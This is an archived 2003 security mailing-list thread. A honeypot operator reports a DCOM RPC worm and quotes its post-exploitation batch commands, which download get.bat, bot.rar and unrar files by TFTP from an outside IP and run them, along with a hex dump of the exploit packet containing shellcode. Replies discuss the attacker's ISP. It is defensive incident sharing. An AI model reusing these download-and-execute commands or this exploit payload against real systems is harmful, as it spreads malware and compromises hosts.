RE: DCOM worm with get.bat bot.rar
From: Peter Ellison (p.pe_at_btopenworld.com)
Date: 08/20/03
- Previous message: James C. Slora Jr.: "Re: Anyone else seeing a radical increase in Sobig?"
- In reply to: Jeremiah Cornelius: "Re: DCOM worm with get.bat bot.rar"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <incidents@securityfocus.com> Date: Wed, 20 Aug 2003 13:55:27 +0100
This Ip range is dynamically applied at login time, why the perp hardwired
his/her "project" your guess is as good as mine. From personal dealings with
this ISP, allocation of IP is not as dynamic as it's supposed to be. The
record for me so far is 6 weeks without a change !
-----Original Message-----
From: Jeremiah Cornelius [mailto:jeremiah@nur.net]
Sent: 19 August 2003 18:35
To: incidents@securityfocus.com
Subject: Re: DCOM worm with get.bat bot.rar
The address is a NTL ip in North UK. Likely a DSL there. Looks like it's
been unplugged, or DoSsd by tftp!
----- Original Message -----
From: "Andrej" <laj@swordlord.com>
To: <incidents@securityfocus.com>
Sent: Tuesday, August 19, 2003 2:05 AM
Subject: DCOM worm with get.bat bot.rar
> I just got a new DCOM worm on our honeypot. After the exploit on port 135
> (dump below) a connection was built on port 4444:
> TFTP -i 81.103.7.66 GET get.bat
> get.bat
> exit
> I was able to get the get.bat it's:
> mkdir C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> TFTP -i 81.103.7.66 GET bot.rar
> TFTP -i 81.103.7.66 GET unrar.bat
> TFTP -i 81.103.7.66 GET unrar.exe
> start unrar.bat
> exit
> unfortunately I was not able to download the bot.rar for inspection
because
> the connection timed out. Maybe somebody else is more successful
>
> cheers
> andrej
>
>
>
> [2003-08-19 10:37:34]
> IPv4: 81.103.7.66 -> *
> hlen=5 TOS=0 dlen=1500 ID=48197 flags=0 offset=0 TTL=114
> chksum=43601
> TCP: port=1176 -> dport: 135 flags=***A**** seq=2683878707
> ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=61593
> Payload: length = 1460
>
> 000 : 05 00 00 03 10 00 00 00 A8 06 00 00 E5 00 00 00 ................
> 010 : 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ................
> 020 : 00 00 00 00 32 24 58 FD CC 45 64 49 B0 70 DD AE ....2$X..EdI.p..
> 030 : 74 2C 96 D2 60 5E 0D 00 01 00 00 00 00 00 00 00 t,..`^..........
> 040 : 70 5E 0D 00 02 00 00 00 7C 5E 0D 00 00 00 00 00 p^......|^......
> 050 : 10 00 00 00 80 96 F1 F1 2A 4D CE 11 A6 6A 00 20 ........*M...j.
> 060 : AF 6E 72 F4 0C 00 00 00 4D 41 52 42 01 00 00 00 .nr.....MARB....
> 070 : 00 00 00 00 0D F0 AD BA 00 00 00 00 A8 F4 0B 00 ................
> 080 : 20 06 00 00 20 06 00 00 4D 45 4F 57 04 00 00 00 ... ...MEOW....
> 090 : A2 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
> 0a0 : 38 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 8..............F
> 0b0 : 00 00 00 00 F0 05 00 00 E8 05 00 00 00 00 00 00 ................
> 0c0 : 01 10 08 00 CC CC CC CC C8 00 00 00 4D 45 4F 57 ............MEOW
> 0d0 : E8 05 00 00 D8 00 00 00 00 00 00 00 02 00 00 00 ................
> 0e0 : 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 0f0 : 00 00 00 00 C4 28 CD 00 64 29 CD 00 00 00 00 00 .....(..d)......
> 100 : 07 00 00 00 B9 01 00 00 00 00 00 00 C0 00 00 00 ................
> 110 : 00 00 00 46 AB 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 120 : 00 00 00 46 A5 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 130 : 00 00 00 46 A6 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 140 : 00 00 00 46 A4 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 150 : 00 00 00 46 AD 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 160 : 00 00 00 46 AA 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 170 : 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 ...F....`...X...
> 180 : 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 ....@... ...8...
> 190 : 30 00 00 00 01 00 00 00 01 10 08 00 CC CC CC CC 0...............
> 1a0 : 50 00 00 00 4F B6 88 20 FF FF FF FF 00 00 00 00 P...O.. ........
> 1b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 1c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 1d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 1e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 1f0 : 00 00 00 00 00 00 00 00 01 10 08 00 CC CC CC CC ................
> 200 : 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 H.....f.........
> 210 : C0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 .......F........
> 220 : 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0C 00 ............x...
> 230 : 58 00 00 00 05 00 06 00 01 00 00 00 70 D8 98 93 X...........p...
> 240 : 98 4F D2 11 A9 3D BE 57 B2 00 00 00 32 00 31 00 .O...=.W....2.1.
> 250 : 01 10 08 00 CC CC CC CC 80 00 00 00 0D F0 AD BA ................
> 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 270 : 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 .C......`...`...
> 280 : 4D 45 4F 57 04 00 00 00 C0 01 00 00 00 00 00 00 MEOW............
> 290 : C0 00 00 00 00 00 00 46 3B 03 00 00 00 00 00 00 .......F;.......
> 2a0 : C0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 .......F....0...
> 2b0 : 01 00 01 00 81 C5 17 03 80 0E E9 4A 99 99 F1 8A ...........J....
> 2c0 : 50 6F 7A 85 02 00 00 00 00 00 00 00 00 00 00 00 Poz.............
> 2d0 : 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
> 2e0 : 01 10 08 00 CC CC CC CC 30 00 00 00 78 00 6E 00 ........0...x.n.
> 2f0 : 00 00 00 00 D8 DA 0D 00 00 00 00 00 00 00 00 00 ................
> 300 : 20 2F 0C 00 00 00 00 00 00 00 00 00 03 00 00 00 /..............
> 310 : 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 ........F.X.....
> 320 : 01 10 08 00 CC CC CC CC 10 00 00 00 30 00 2E 00 ............0...
> 330 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 340 : 01 10 08 00 CC CC CC CC 68 00 00 00 0E 00 FF FF ........h.......
> 350 : 68 8B 0B 00 02 00 00 00 00 00 00 00 00 00 00 00 h...............
> 360 : 86 01 00 00 00 00 00 00 86 01 00 00 5C 00 5C 00 ............\.\.
> 370 : 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B.F.X.F.X.
> 380 : 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X.F.X.F.X.
> 390 : 46 00 58 00 9D 13 00 01 CC E0 FD 7F CC E0 FD 7F F.X...........
> 3a0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3b0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3c0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3d0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3e0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3f0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 400 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 410 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 420 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 430 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 440 : 90 90 90 90 90 90 90 EB 19 5E 31 C9 81 E9 89 FF .........^1.....
> 450 : FF FF 81 36 80 BF 32 94 81 EE FC FF FF FF E2 F2 ...6..2.........
> 460 : EB 05 E8 E2 FF FF FF 03 53 06 1F 74 57 75 95 80 ........S..tWu..
> 470 : BF BB 92 7F 89 5A 1A CE B1 DE 7C E1 BE 32 94 09 ....Z....|..2..
> 480 : F9 3A 6B B6 D7 9F 4D 85 71 DA C6 81 BF 32 1D C6 .:k...M.q....2..
> 490 : B3 5A F8 EC BF 32 FC B3 8D 1C F0 E8 C8 41 A6 DF .Z...2.......A..
> 4a0 : EB CD C2 88 36 74 90 7F 89 5A E6 7E 0C 24 7C AD ....6t..Z.~.$|.
> 4b0 : BE 32 94 09 F9 22 6B B6 D7 4C 4C 62 CC DA 8A 81 .2..."k..LLb....
> 4c0 : BF 32 1D C6 AB CD E2 84 D7 F9 79 7C 84 DA 9A 81 .2........y|....
> 4d0 : BF 32 1D C6 A7 CD E2 84 D7 EB 9D 75 12 DA 6A 80 .2.........u..j.
> 4e0 : BF 32 1D C6 A3 CD E2 84 D7 96 8E F0 78 DA 7A 80 .2..........x.z.
> 4f0 : BF 32 1D C6 9F CD E2 84 D7 96 39 AE 56 DA 4A 80 .2........9.V.J.
> 500 : BF 32 1D C6 9B CD E2 84 D7 D7 DD 06 F6 DA 5A 80 .2............Z.
> 510 : BF 32 1D C6 97 CD E2 84 D7 D5 ED 46 C6 DA 2A 80 .2.........F..*.
> 520 : BF 32 1D C6 93 01 6B 01 53 A2 95 80 BF 66 FC 81 .2....k.S....f..
> 530 : BE 32 94 7F E9 2A C4 D0 EF 62 D4 D0 FF 62 6B D6 .2..*...b...bk.
> 540 : A3 B9 4C D7 E8 5A 96 80 AE 6E 1F 4C D5 24 C5 D3 ..L..Z...n.L.$..
> 550 : 40 64 B4 D7 EC CD C2 A4 E8 63 C7 7F E9 1A 1F 50 @d.......c....P
> 560 : D7 57 EC E5 BF 5A F7 ED DB 1C 1D E6 8F B1 78 D4 .W...Z........x.
> 570 : 32 0E B0 B3 7F 01 5D 03 7E 27 3F 62 42 F4 D0 A4 2....].~'?bB...
> 580 : AF 76 6A C4 9B 0F 1D D4 9B 7A 1D D4 9B 7E 1D D4 .vj......z...~..
> 590 : 9B 62 19 C4 9B 22 C0 D0 EE 63 C5 EA BE 63 C5 7F .b..."...c...c.
> 5a0 : C9 02 C5 7F E9 22 1F 4C D5 CD 6B B1 40 64 98 0B ....".L..k.@d..
> 5b0 : 77 65 6B D6 wek.
>
>
> [2003-08-19 10:37:34]
> IPv4: 81.103.7.66 -> *
> hlen=5 TOS=0 dlen=284 ID=48198 flags=0 offset=0 TTL=114
> chksum=44816
> TCP: port=1176 -> dport: 135 flags=***AP*** seq=2683880167
> ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=21751
> Payload: length = 244
>
> 000 : 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C .....d.!.2..:...
> 010 : 34 72 98 0B CF 2E 39 0B D7 3A 7F 89 34 72 A0 0B 4r....9..:.4r..
> 020 : 17 8A 94 80 BF B9 51 DE E2 F0 90 80 EC 67 C2 D7 ......Q......g..
> 030 : 34 5E B0 98 34 77 A8 0B EB 37 EC 83 6A B9 DE 98 4^..4w...7..j...
> 040 : 34 68 B4 83 62 D1 A6 C9 34 06 1F 83 4A 01 6B 7C 4h..b...4...J.k|
> 050 : 8C F2 38 BA 7B 46 93 41 70 3F 97 78 54 C0 AF FC ..8.{F.Ap?.xT...
> 060 : 9B 26 E1 61 34 68 B0 83 62 54 1F 8C F4 B9 CE 9C .&.a4h..bT......
> 070 : BC EF 1F 84 34 31 51 6B BD 01 54 0B 6A 6D CA DD ....41Qk..T.jm..
> 080 : E4 F0 90 80 2F A2 04 00 5C 00 43 00 24 00 5C 00 ..../...\.C.$.\.
> 090 : 31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 1.2.3.4.5.6.1.1.
> 0a0 : 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
> 0b0 : 31 00 31 00 31 00 31 00 31 00 2E 00 64 00 6F 00 1.1.1.1.1...d.o.
> 0c0 : 63 00 00 00 01 10 08 00 CC CC CC CC 20 00 00 00 c........... ...
> 0d0 : 30 00 2D 00 00 00 00 00 88 2A 0C 00 02 00 00 00 0.-......*......
> 0e0 : 01 00 00 00 28 8C 0C 00 01 00 00 00 07 00 00 00 ....(...........
> 0f0 : 00 00 00 00 ....
>
> --------------------------------------------------------------------------
-
> Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
> - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
> - Automatically Control P2P, IM and Spam Traffic
> - Ensure Reliable Performance of Mission Critical Applications
> - Precisely Define and Implement Network Security and Performance
Policies
> **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
> Visit us at:
> http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
> --------------------------------------------------------------------------
-- > > --------------------------------------------------------------------------- Captus Networks - Integrated Intrusion Prevention and Traffic Shaping - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans - Automatically Control P2P, IM and Spam Traffic - Ensure Reliable Performance of Mission Critical Applications - Precisely Define and Implement Network Security and Performance Policies **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo Visit us at: http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814 ---------------------------------------------------------------------------- --------------------------------------------------------------------------- Captus Networks - Integrated Intrusion Prevention and Traffic Shaping - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans - Automatically Control P2P, IM and Spam Traffic - Ensure Reliable Performance of Mission Critical Applications - Precisely Define and Implement Network Security and Performance Policies **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo Visit us at: http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814 ----------------------------------------------------------------------------
- Previous message: James C. Slora Jr.: "Re: Anyone else seeing a radical increase in Sobig?"
- In reply to: Jeremiah Cornelius: "Re: DCOM worm with get.bat bot.rar"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
